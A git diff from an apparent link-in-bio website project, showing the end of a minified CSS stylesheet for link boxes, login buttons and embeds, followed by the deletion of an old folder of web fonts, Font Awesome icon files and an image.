.pb-mobile-grid-old-title .pb-linkbox-inner{position:relative}}@media (min-width:768px){.effect-oldvideo .pb-desktop-grid-sqr-notit,.effect-oldvideo .pb-desktop-instagram,.effect-oldvideo .pb-desktop-grid-rec-notit,.effect-oldvideo .pb-desktop-grid-sqr-title,.effect-oldvideo .pb-desktop-grid-vertical-title,.effect-oldvideo .pb-desktop-grid-vertical-notitle,.effect-oldvideo .pb-desktop-grid-rec-title,.effect-oldvideo .pb-desktop-grid-old-title{padding-right:8px!important;padding-left:8px!important}.effect-oldvideo .pb-desktop-grid-sqr-notit .pb-linkbox-inner,.effect-oldvideo .pb-desktop-instagram .pb-linkbox-inner,.effect-oldvideo .pb-desktop-grid-rec-notit .pb-linkbox-inner,.effect-oldvideo .pb-desktop-grid-sqr-title .pb-linkbox-inner,.effect-oldvideo .pb-desktop-grid-vertical-title .pb-linkbox-inner,.effect-oldvideo .pb-desktop-grid-vertical-notitle .pb-linkbox-inner,.effect-oldvideo .pb-desktop-grid-rec-title .pb-linkbox-inner,.effect-oldvideo .pb-desktop-grid-old-title .pb-linkbox-inner{position:relative}}@media (max-width:768px){.effect-oldvideo .pb-mobile-list-small-rnd .pb-linkbox-inner::before{border-radius:33px!important}.effect-oldvideo .pb-mobile-list-small-sqr .pb-linkbox-inner::before{border-radius:4px!important}}@media (min-width:768px){.effect-oldvideo .pb-desktop-list-small-rnd .pb-linkbox-inner::before{border-radius:33px!important}.effect-oldvideo .pb-desktop-list-small-sqr .pb-linkbox-inner::before{border-radius:4px!important}}.effect-gradient .pb-linkbox-inner{box-shadow:0 0 6px 0 rgba(157,96,212,.5);border:solid 4px transparent;background-image:linear-gradient(rgba(255,255,255,0),rgba(255,255,255,0)),linear-gradient(101deg,#78e4ff,#ff48fa);background-origin:border-box;background-clip:content-box,border-box;box-shadow:4px 1000px 1px #fff inset}.effect-summer .pb-linkbox-inner{box-shadow:0 0 6px 0 rgba(157,96,212,.5);border:solid 4px transparent;background-image:linear-gradient(rgba(255,255,255,0),rgba(255,255,255,0)),linear-gradient(101deg,#fff678,#78e4ff);background-origin:border-box;background-clip:content-box,border-box;box-shadow:4px 1000px 1px #fff inset}.effect-box .pb-linkbox{margin-bottom:20px!important}@media (max-width:768px){.effect-box .pb-mobile-grid-sqr-notit .pb-linkbox-inner::before,.effect-box .pb-mobile-grid-vertical-notitle .pb-linkbox-inner::before,.effect-box .pb-mobile-grid-vertical-title .pb-linkbox-inner::before,.effect-box .pb-mobile-instagram .pb-linkbox-inner::before,.effect-box .pb-mobile-grid-rec-notit .pb-linkbox-inner::before,.effect-box .pb-mobile-grid-sqr-title .pb-linkbox-inner::before,.effect-box .pb-mobile-grid-rec-title .pb-linkbox-inner::before,.effect-box .pb-mobile-grid-old-title .pb-linkbox-inner::before,.effect-box .pb-mobile-list-large-sqr .pb-linkbox-inner::before{bottom:-12px;left:-2px;right:-2px}.effect-box .pb-mobile-list-large-rec .pb-linkbox-inner::before,.effect-box .pb-mobile-list-large-old .pb-linkbox-inner::before{bottom:-12px;left:0;right:0}.effect-box .pb-mobile-grid-sqr-notit .pb-linkbox-inner,.effect-box .pb-mobile-grid-vertical-title .pb-linkbox-inner,.effect-box .pb-mobile-grid-vertical-notitle .pb-linkbox-inner,.effect-box .pb-mobile-instagram .pb-linkbox-inner,.effect-box .pb-mobile-grid-rec-notit .pb-linkbox-inner,.effect-box .pb-mobile-grid-sqr-title .pb-linkbox-inner,.effect-box .pb-mobile-grid-rec-title .pb-linkbox-inner,.effect-box .pb-mobile-grid-old-title .pb-linkbox-inner{position:relative}}@media (min-width:768px){.effect-box .pb-desktop-grid-sqr-notit .pb-linkbox-inner::before,.effect-box .pb-desktop-instagram .pb-linkbox-inner::before,.effect-box .pb-desktop-grid-rec-notit .pb-linkbox-inner::before,.effect-box .pb-desktop-grid-sqr-title .pb-linkbox-inner::before,.effect-box .pb-desktop-grid-vertical-title .pb-linkbox-inner::before,.effect-box .pb-desktop-grid-vertical-notitle .pb-linkbox-inner::before,.effect-box .pb-desktop-grid-rec-title .pb-linkbox-inner::before,.effect-box .pb-desktop-grid-old-title .pb-linkbox-inner::before,.effect-box .pb-desktop-list-large-sqr .pb-linkbox-inner::before{bottom:-12px;left:-2px;right:-2px}.effect-box .pb-desktop-list-large-rec .pb-linkbox-inner::before,.effect-box .pb-desktop-list-large-old .pb-linkbox-inner::before{bottom:-12px;left:-1px;right:0}.effect-box .pb-desktop-grid-sqr-notit .pb-linkbox-inner,.effect-box .pb-desktop-instagram .pb-linkbox-inner,.effect-box .pb-desktop-grid-rec-notit .pb-linkbox-inner,.effect-box .pb-desktop-grid-sqr-title .pb-linkbox-inner,.effect-box .pb-desktop-grid-vertical-title .pb-linkbox-inner,.effect-box .pb-desktop-grid-vertical-notitle .pb-linkbox-inner,.effect-box .pb-desktop-grid-rec-title .pb-linkbox-inner,.effect-box .pb-desktop-grid-old-title .pb-linkbox-inner{position:relative}}@media (max-width:768px){.effect-box .pb-mobile-list-small-rnd .pb-linkbox-inner::before{border-radius:33px!important}}@media (min-width:768px){.effect-box .pb-desktop-list-small-rnd .pb-linkbox-inner::before{border-radius:33px!important}.effect-box .pb-linkbox-inner::before{bottom:-10px!important;left:-2px!important;right:-2px!important}}.effect-box .pb-linkbox-inner::before{content:'';position:absolute;left:2px;top:10px;right:2px;bottom:-10px;background:#3D4043;border-radius:4px!important;z-index:-1;border:2px solid #3D4043}.newsletter-logo{width:60px;height:60px}.newsletter-logo i{margin-top:2px;margin-left:1px}.textarea-higher{min-height:200px}.block-embed-container iframe{max-width:100%}.block-embed-container .twitter-tweet,.block-embed-container .instagram-media{margin-left:auto!important;margin-right:auto!important}.login-button{display:inline-block;position:relative;border:1px solid rgba(22,24,35,.12);border-radius:0;margin:5px 0;padding:10px 15px;cursor:pointer;width:100%;border-radius:26px!important}.login-button img{height:24px;position:absolute;left:15px;top:50%;transform:translateY(-50%)}.login-button.tiktok-signup-btn img,.login-button.tiktok-login-btn img{left:17px}.login-button:hover,.login-button:active,.login-button:focus{color:#333}.login-button span{padding-left:24px}.login-spinner{margin:20px auto 0 auto;border:8px solid #f3f3f3;border-top:8px solid #f8c7bf;border-radius:50%;width:80px;height:80px;animation:spin 2s linear infinite}@keyframes spin{0%{transform:rotate(0deg)}100%{transform:rotate(360deg)}}.apple .fa-apple{position:absolute;left:17px;top:7px;font-size:26px}.tiktok .fa-tiktok{position:absolute;left:17px;top:7px;font-size:26px}.signup-button{padding-left:12px;padding-right:12px}.credentials .fa-envelope{position:absolute;left:17px;font-size:20px}#PB_SignupModal .custom-control-label{padding-top:3px}.embed-responsive-9by16::before{padding-top:177.77%}.public-copy-btn input,.public-copy-btn button{height:55px!important}.public-copy-btn input[readonly]{background-color:#FFF}.public-search-btn input,.public-search-btn button{height:55px!important}.btn-circle{width:42px!important;height:42px!important;border-radius:50%;position:relative}.btn-circle i{position:absolute;left:50%;top:50%;transform:translate(-50%,-50%)}.tag-circle{width:30px;height:30px;border-radius:50%;position:relative}.tag-absolute-position{transform:translate(-50%,-50%)}.btn-circle-check-sign{top:8px;right:8px;z-index:3}video.bgvideo{position:fixed;top:0;left:0;width:100%;height:100%;z-index:-1;object-fit:cover}.pb-links .pb-linkbox:hover,.public-container-inner a.pb-linkbox:hover{opacity:.8}.lb-icon-pub:hover{opacity:.8}#PB_SignupModal .alert-light{border-color:transparent}#PUB_LnkCarouselModal .slick-prev,#PUB_LnkCarouselModal .slick-next{display:block!important;position:absolute!important;top:52px;;background-color:white!important;box-shadow:0 .5rem 1rem rgba(0,0,0,.15)!important}#PUB_LnkCarouselModal .slick-prev i,#PUB_LnkCarouselModal .slick-next i{color:black!important}#PUB_LnkCarouselModal .slick-dots{top:0}#PUB_LnkCarouselModal .lnk-carousel-container{padding-top:30px}#PUB_LnkCarouselModal .slick-dots li.slick-active button:before,#PUB_LnkCarouselModal .slick-dots li button:before,#PUB_LnkCarouselModal .slick-prev:before,#PUB_LnkCarouselModal .slick-next:before,#PUB_LnkCarouselModal .slick-arrow .fad:before,#PUB_LnkCarouselModal .slick-arrow .fad:after{color:black}.bandcamp-container-large{width:100%;padding-bottom:calc(100% + 120px);height:0}.bandcamp-container-large iframe{position:absolute;top:0;left:0;width:100%;height:100%;border:0} \ No newline at end of file diff --git a/old/fonts/6NUU8F2OJg6MeR7l4e0fs8wB49dJfg.woff2 b/old/fonts/6NUU8F2OJg6MeR7l4e0fs8wB49dJfg.woff2 deleted file mode 100644 index d128575..0000000 Binary files a/old/fonts/6NUU8F2OJg6MeR7l4e0fs8wB49dJfg.woff2 and /dev/null differ diff --git a/old/fonts/6NUU8F2OJg6MeR7l4e0fvMwB49dJfuWv.woff2 b/old/fonts/6NUU8F2OJg6MeR7l4e0fvMwB49dJfuWv.woff2 deleted file mode 100644 index 493157d..0000000 Binary files a/old/fonts/6NUU8F2OJg6MeR7l4e0fvMwB49dJfuWv.woff2 and /dev/null differ diff --git a/old/fonts/6NUU8F2OJg6MeR7l4e0fvcwB49dJfuWv.woff2 b/old/fonts/6NUU8F2OJg6MeR7l4e0fvcwB49dJfuWv.woff2 deleted file mode 100644 index 7bab4eb..0000000 Binary files a/old/fonts/6NUU8F2OJg6MeR7l4e0fvcwB49dJfuWv.woff2 and /dev/null differ diff --git a/old/fonts/KFOlCnqEu92Fr1MmWUlfABc4AMP6lbBP.woff2 b/old/fonts/KFOlCnqEu92Fr1MmWUlfABc4AMP6lbBP.woff2 deleted file mode 100644 index 6d35941..0000000 Binary files a/old/fonts/KFOlCnqEu92Fr1MmWUlfABc4AMP6lbBP.woff2 and /dev/null differ diff --git a/old/fonts/KFOlCnqEu92Fr1MmWUlfBBc4AMP6lQ.woff2 b/old/fonts/KFOlCnqEu92Fr1MmWUlfBBc4AMP6lQ.woff2 deleted file mode 100644 index 4aeda71..0000000 Binary files a/old/fonts/KFOlCnqEu92Fr1MmWUlfBBc4AMP6lQ.woff2 and /dev/null differ diff --git a/old/fonts/KFOlCnqEu92Fr1MmWUlfBxc4AMP6lbBP.woff2 b/old/fonts/KFOlCnqEu92Fr1MmWUlfBxc4AMP6lbBP.woff2 deleted file mode 100644 index 56625d3..0000000 Binary files a/old/fonts/KFOlCnqEu92Fr1MmWUlfBxc4AMP6lbBP.woff2 and /dev/null differ diff --git a/old/fonts/KFOlCnqEu92Fr1MmWUlfCBc4AMP6lbBP.woff2 b/old/fonts/KFOlCnqEu92Fr1MmWUlfCBc4AMP6lbBP.woff2 deleted file mode 100644 index 594c030..0000000 Binary files a/old/fonts/KFOlCnqEu92Fr1MmWUlfCBc4AMP6lbBP.woff2 and /dev/null differ diff --git a/old/fonts/KFOlCnqEu92Fr1MmWUlfCRc4AMP6lbBP.woff2 b/old/fonts/KFOlCnqEu92Fr1MmWUlfCRc4AMP6lbBP.woff2 deleted file mode 100644 index 7c488a1..0000000 Binary files a/old/fonts/KFOlCnqEu92Fr1MmWUlfCRc4AMP6lbBP.woff2 and /dev/null differ diff --git a/old/fonts/KFOlCnqEu92Fr1MmWUlfChc4AMP6lbBP.woff2 b/old/fonts/KFOlCnqEu92Fr1MmWUlfChc4AMP6lbBP.woff2 deleted file mode 100644 index 54de557..0000000 Binary files a/old/fonts/KFOlCnqEu92Fr1MmWUlfChc4AMP6lbBP.woff2 and /dev/null differ diff --git a/old/fonts/KFOlCnqEu92Fr1MmWUlfCxc4AMP6lbBP.woff2 b/old/fonts/KFOlCnqEu92Fr1MmWUlfCxc4AMP6lbBP.woff2 deleted file mode 100644 index 7a7dec9..0000000 Binary files a/old/fonts/KFOlCnqEu92Fr1MmWUlfCxc4AMP6lbBP.woff2 and /dev/null differ diff --git a/old/fonts/KFOmCnqEu92Fr1Mu4WxKKTU1Kvnz.woff2 b/old/fonts/KFOmCnqEu92Fr1Mu4WxKKTU1Kvnz.woff2 deleted file mode 100644 index c330255..0000000 Binary files a/old/fonts/KFOmCnqEu92Fr1Mu4WxKKTU1Kvnz.woff2 and /dev/null differ diff --git a/old/fonts/KFOmCnqEu92Fr1Mu4mxKKTU1Kg.woff2 b/old/fonts/KFOmCnqEu92Fr1Mu4mxKKTU1Kg.woff2 deleted file mode 100644 index b65a361..0000000 Binary files a/old/fonts/KFOmCnqEu92Fr1Mu4mxKKTU1Kg.woff2 and /dev/null differ diff --git a/old/fonts/KFOmCnqEu92Fr1Mu5mxKKTU1Kvnz.woff2 b/old/fonts/KFOmCnqEu92Fr1Mu5mxKKTU1Kvnz.woff2 deleted file mode 100644 index bf2b173..0000000 Binary files a/old/fonts/KFOmCnqEu92Fr1Mu5mxKKTU1Kvnz.woff2 and /dev/null differ diff --git a/old/fonts/KFOmCnqEu92Fr1Mu72xKKTU1Kvnz.woff2 b/old/fonts/KFOmCnqEu92Fr1Mu72xKKTU1Kvnz.woff2 deleted file mode 100644 index 0a6904a..0000000 Binary files a/old/fonts/KFOmCnqEu92Fr1Mu72xKKTU1Kvnz.woff2 and /dev/null differ diff --git a/old/fonts/KFOmCnqEu92Fr1Mu7GxKKTU1Kvnz.woff2 b/old/fonts/KFOmCnqEu92Fr1Mu7GxKKTU1Kvnz.woff2 deleted file mode 100644 index ee30585..0000000 Binary files a/old/fonts/KFOmCnqEu92Fr1Mu7GxKKTU1Kvnz.woff2 and /dev/null differ diff --git a/old/fonts/KFOmCnqEu92Fr1Mu7WxKKTU1Kvnz.woff2 b/old/fonts/KFOmCnqEu92Fr1Mu7WxKKTU1Kvnz.woff2 deleted file mode 100644 index f9448bf..0000000 Binary files a/old/fonts/KFOmCnqEu92Fr1Mu7WxKKTU1Kvnz.woff2 and /dev/null differ diff --git a/old/fonts/KFOmCnqEu92Fr1Mu7mxKKTU1Kvnz.woff2 b/old/fonts/KFOmCnqEu92Fr1Mu7mxKKTU1Kvnz.woff2 deleted file mode 100644 index 46a3bc3..0000000 Binary files a/old/fonts/KFOmCnqEu92Fr1Mu7mxKKTU1Kvnz.woff2 and /dev/null differ diff --git a/old/fonts/fa-brands-400.eot b/old/fonts/fa-brands-400.eot deleted file mode 100644 index 1ee7a56..0000000 Binary files a/old/fonts/fa-brands-400.eot and /dev/null differ diff --git a/old/fonts/fa-brands-400.ttf b/old/fonts/fa-brands-400.ttf deleted file mode 100644 index 032f907..0000000 Binary files a/old/fonts/fa-brands-400.ttf and /dev/null differ diff --git a/old/fonts/fa-brands-400.woff b/old/fonts/fa-brands-400.woff deleted file mode 100644 index e6a44f8..0000000 Binary files a/old/fonts/fa-brands-400.woff and /dev/null differ diff --git a/old/fonts/fa-brands-400.woff2 b/old/fonts/fa-brands-400.woff2 deleted file mode 100644 index c851402..0000000 Binary files a/old/fonts/fa-brands-400.woff2 and /dev/null differ diff --git a/old/fonts/fa-duotone-900.eot b/old/fonts/fa-duotone-900.eot deleted file mode 100644 index b4a9aa8..0000000 Binary files a/old/fonts/fa-duotone-900.eot and /dev/null differ diff --git a/old/fonts/fa-duotone-900.ttf b/old/fonts/fa-duotone-900.ttf deleted file mode 100644 index bc8c92b..0000000 Binary files a/old/fonts/fa-duotone-900.ttf and /dev/null differ diff --git a/old/fonts/fa-duotone-900.woff b/old/fonts/fa-duotone-900.woff deleted file mode 100644 index 09cc0ba..0000000 Binary files a/old/fonts/fa-duotone-900.woff and /dev/null differ diff --git a/old/fonts/fa-duotone-900.woff2 b/old/fonts/fa-duotone-900.woff2 deleted file mode 100644 index ac0d45b..0000000 Binary files a/old/fonts/fa-duotone-900.woff2 and /dev/null differ diff --git a/old/fonts/fa-light-300.eot b/old/fonts/fa-light-300.eot deleted file mode 100644 index fd2cfc7..0000000 Binary files a/old/fonts/fa-light-300.eot and /dev/null differ diff --git a/old/fonts/fa-light-300.ttf b/old/fonts/fa-light-300.ttf deleted file mode 100644 index ea1f36c..0000000 Binary files a/old/fonts/fa-light-300.ttf and /dev/null differ diff --git a/old/fonts/fa-light-300.woff b/old/fonts/fa-light-300.woff deleted file mode 100644 index da6981a..0000000 Binary files a/old/fonts/fa-light-300.woff and /dev/null differ diff --git a/old/fonts/fa-light-300.woff2 b/old/fonts/fa-light-300.woff2 deleted file mode 100644 index fbdeaaa..0000000 Binary files a/old/fonts/fa-light-300.woff2 and /dev/null differ diff --git a/old/fonts/fa-regular-400.eot b/old/fonts/fa-regular-400.eot deleted file mode 100644 index c0bf92e..0000000 Binary files a/old/fonts/fa-regular-400.eot and /dev/null differ diff --git a/old/fonts/fa-regular-400.ttf b/old/fonts/fa-regular-400.ttf deleted file mode 100644 index 2d03c19..0000000 Binary files a/old/fonts/fa-regular-400.ttf and /dev/null differ diff --git a/old/fonts/fa-regular-400.woff b/old/fonts/fa-regular-400.woff deleted file mode 100644 index 012f42c..0000000 Binary files a/old/fonts/fa-regular-400.woff and /dev/null differ diff --git a/old/fonts/fa-regular-400.woff2 b/old/fonts/fa-regular-400.woff2 deleted file mode 100644 index 70fc754..0000000 Binary files a/old/fonts/fa-regular-400.woff2 and /dev/null differ diff --git a/old/fonts/fa-solid-900.eot b/old/fonts/fa-solid-900.eot deleted file mode 100644 index ddbd2a5..0000000 Binary files a/old/fonts/fa-solid-900.eot and /dev/null differ diff --git a/old/fonts/fa-solid-900.ttf b/old/fonts/fa-solid-900.ttf deleted file mode 100644 index e6330e6..0000000 Binary files a/old/fonts/fa-solid-900.ttf and /dev/null differ diff --git a/old/fonts/fa-solid-900.woff b/old/fonts/fa-solid-900.woff deleted file mode 100644 index 45f5cd5..0000000 Binary files a/old/fonts/fa-solid-900.woff and /dev/null differ diff --git a/old/fonts/fa-solid-900.woff2 b/old/fonts/fa-solid-900.woff2 deleted file mode 100644 index dff46ed..0000000 Binary files a/old/fonts/fa-solid-900.woff2 and /dev/null differ diff --git a/old/fonts/iconsbio1_3384ab2a3f8bd680b21eff9a2943bea8.eot b/old/fonts/iconsbio1_3384ab2a3f8bd680b21eff9a2943bea8.eot deleted file mode 100644 index 849136f..0000000 --- a/old/fonts/iconsbio1_3384ab2a3f8bd680b21eff9a2943bea8.eot +++ /dev/null @@ -1 +0,0 @@ -Couldn't find the requested file /iconsbio1_3384ab2a3f8bd680b21eff9a2943bea8.eot in andreaolivato/ib. \ No newline at end of file diff --git a/old/fonts/iconsbio1_3384ab2a3f8bd680b21eff9a2943bea8.ttf b/old/fonts/iconsbio1_3384ab2a3f8bd680b21eff9a2943bea8.ttf deleted file mode 100644 index b6345b1..0000000 Binary files a/old/fonts/iconsbio1_3384ab2a3f8bd680b21eff9a2943bea8.ttf and /dev/null differ diff --git a/old/fonts/iconsbio1_3384ab2a3f8bd680b21eff9a2943bea8.woff b/old/fonts/iconsbio1_3384ab2a3f8bd680b21eff9a2943bea8.woff deleted file mode 100644 index b9d10ce..0000000 Binary files a/old/fonts/iconsbio1_3384ab2a3f8bd680b21eff9a2943bea8.woff and /dev/null differ diff --git a/old/fonts/iconsbio1_3384ab2a3f8bd680b21eff9a2943bea8.woff2 b/old/fonts/iconsbio1_3384ab2a3f8bd680b21eff9a2943bea8.woff2 deleted file mode 100644 index fc585aa..0000000 Binary files a/old/fonts/iconsbio1_3384ab2a3f8bd680b21eff9a2943bea8.woff2 and /dev/null differ diff --git a/old/fonts/iconsbio2_c50814b9b24c1e58d9e3e9a245a8c9e5.eot b/old/fonts/iconsbio2_c50814b9b24c1e58d9e3e9a245a8c9e5.eot deleted file mode 100644 index e257e32..0000000 --- a/old/fonts/iconsbio2_c50814b9b24c1e58d9e3e9a245a8c9e5.eot +++ /dev/null @@ -1 +0,0 @@ -Couldn't find the requested file /iconsbio2_c50814b9b24c1e58d9e3e9a245a8c9e5.eot in andreaolivato/ib. \ No newline at end of file diff --git a/old/fonts/iconsbio2_c50814b9b24c1e58d9e3e9a245a8c9e5.ttf b/old/fonts/iconsbio2_c50814b9b24c1e58d9e3e9a245a8c9e5.ttf deleted file mode 100644 index 82fa0fd..0000000 Binary files a/old/fonts/iconsbio2_c50814b9b24c1e58d9e3e9a245a8c9e5.ttf and /dev/null differ diff --git a/old/fonts/iconsbio2_c50814b9b24c1e58d9e3e9a245a8c9e5.woff b/old/fonts/iconsbio2_c50814b9b24c1e58d9e3e9a245a8c9e5.woff deleted file mode 100644 index 6f9b681..0000000 Binary files a/old/fonts/iconsbio2_c50814b9b24c1e58d9e3e9a245a8c9e5.woff and /dev/null differ diff --git a/old/fonts/iconsbio2_c50814b9b24c1e58d9e3e9a245a8c9e5.woff2 b/old/fonts/iconsbio2_c50814b9b24c1e58d9e3e9a245a8c9e5.woff2 deleted file mode 100644 index d699d4e..0000000 Binary files a/old/fonts/iconsbio2_c50814b9b24c1e58d9e3e9a245a8c9e5.woff2 and /dev/null differ diff --git a/old/images/-1972504_20240706263.jpg b/old/images/-1972504_20240706263.jpg deleted file mode 100644 index 9e55165..0000000 Binary files a/old/images/-1972504_20240706263.jpg and /dev/null differ diff --git a/old/images/fa-brands-400.svg b/old/images/fa-brands-400.svg deleted file mode 100644 index 1345151..0000000 --- a/old/images/fa-brands-400.svg +++ /dev/null @@ -1,3717 +0,0 @@ - - - - -Created by FontForge 20201107 at Wed Aug 4 12:24:13 2021 - By Robert Madole -Copyright (c) Font Awesome - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/old/images/fa-duotone-900.svg b/old/images/fa-duotone-900.svg deleted file mode 100644 index 231438e..0000000 --- a/old/images/fa-duotone-900.svg +++ /dev/null @@ -1,15328 +0,0 @@ - - - - -Created by FontForge 20201107 at Wed Aug 4 12:24:16 2021 - By Robert Madole -Copyright (c) Font Awesome - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/old/images/fa-light-300.svg 